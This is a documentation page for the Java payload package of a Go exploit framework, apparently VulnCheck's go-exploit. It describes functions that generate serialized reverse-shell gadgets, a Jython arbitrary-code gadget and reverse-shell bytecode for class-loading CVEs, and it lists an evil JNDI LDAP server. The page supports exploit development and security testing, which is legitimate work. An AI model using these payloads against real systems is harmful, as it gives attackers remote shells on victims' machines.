java

package

v1.11.1 Latest Latest Go to latest Published: Apr 8, 2024 License: Apache-2.0 Imports: 6 Imported by: 1

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/vulncheck-oss/go-exploit

Links

Open Source Insights

Documentation ¶

Index ¶

func CreateBeanutilsReverseShell(lhost string, lport int) string
func CreateJythonRunCodeGadget(payload string) string
func ReverseShellBytecode(conf *config.Config) (string, string)

Constants ¶

This section is empty.

Variables ¶

This section is empty.

Functions ¶

func CreateBeanutilsReverseShell ¶

func CreateBeanutilsReverseShell(lhost string, lport int) string

This is a serialized java reverse shell. The gadget was generated by ysoserial but using the code in this pull https://github.com/frohoff/ysoserial/pull/96 and updated to make it easy to swap in the desired lhost+lport of our choosing without having to recreate the gadget.

The gadget works on both Windows and Linux and will automatically detect the platform and tool to use for executing commands (cmd.exe or /bin/bash).

func CreateJythonRunCodeGadget ¶ added in v1.1.0

func CreateJythonRunCodeGadget(payload string) string

This function generates a serialized Jython payload that executes arbitrary Python. It's the "runcode" variation of Steven Seeley and Rocco Calvi's Jython2:

https://github.com/frohoff/ysoserial/pull/200/files

The payload can be used like so:

java.CreateJythonRunCodeGadget(payload.UnflattenedSecureReversePython27(conf.Lhost, conf.Lport))

The payload was serialized and tested on Java 11.

func ReverseShellBytecode ¶ added in v1.8.1

func ReverseShellBytecode(conf *config.Config) (string, string)

This is the Java bytecode for a reverse shell. You can find the source code here:

https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508

The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class (see CVE-2020-7961) or loading a class from a byte string (see CVE-2023-22527).

The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:

albinolobster@mournland:/tmp/java$ java -version
openjdk version "1.8.0_392"
OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08)
OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode)
albinolobster@mournland:/tmp/java$ javac ABCDEFG.java
albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class
-rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class

This function replaces hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).

Types ¶

This section is empty.

Source Files ¶

View all Source files

Directories ¶

Path	Synopsis
ldapjndi This is an implementation of an evil JNDI LDAP server.	This is an implementation of an evil JNDI LDAP server.

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL